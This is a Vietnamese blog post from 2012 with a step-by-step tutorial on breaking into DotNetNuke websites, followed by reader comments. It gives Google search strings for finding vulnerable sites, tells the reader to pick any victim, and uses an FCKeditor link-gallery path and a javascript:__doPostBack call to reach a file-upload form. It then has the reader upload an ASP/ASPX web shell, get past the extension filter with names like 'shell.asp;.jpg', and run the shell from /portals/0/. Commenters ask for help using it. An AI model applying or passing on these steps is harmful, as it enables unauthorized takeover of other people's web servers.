Thứ Sáu, 17 tháng 2, 2012

Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)


Bước 1: Sử dụng google để tìm site chứa lỗ hổng DNN

:inurl:/tabid/36/language/en-US/Default.aspx
Inurl:”/portals/0” 

Bước 2: Chọn  1 victim bất kỳ, ví dụ:


Bước 3: Thay thế đoạn url sau:

/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Lúc đó, đường link của victim như sau:

Thông tin thu được:





 

Bước 4: Tích vào File (A File on your site)

     

Sau đó thay thế đường link  bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','') 


Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file


Bước 5: Upload shell

Click Browse và upload shell .asp or. aspx






Thêm 1 số kỹ thuật upload shell đối với asp,
- Có thể bypass đuôi file shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụng tool http live herder or tamper data….

Bước 6: Run shell

Path đường dẫn để http://www.victim.com.vn//portals/0/tên shell


Một số site dính DNN:

6 nhận xét:

nguoi quang tri nói...

javascript:__doPostBack('ctlURL$cmdUpload','')
đoạn java thay vào đâu bạn

DUNG nói...

Xóa url của link đi, rồi coppy đoạn java này vào và chạy nếu hiện ra mục upload thì thành công. Tớ có chụp hình rồi đó ;)

teo nói...

tut hay

heroman nói...

Hi Dũng
Mình muốn khắc phục lỗi trên thì phải fix lại ntn?
Bạn có thể chia sẽ cách thực hiện ko?

heroman nói...

Hi Dũng
Trong file shell kia bạn code ntn để có được table như ảnh đã có bên trên?

Zero Cool nói...

Ban oi minh doi duoi shell thanh c100.php.jpg rui ma ko up dk. Chi Cho minh voi

Đăng nhận xét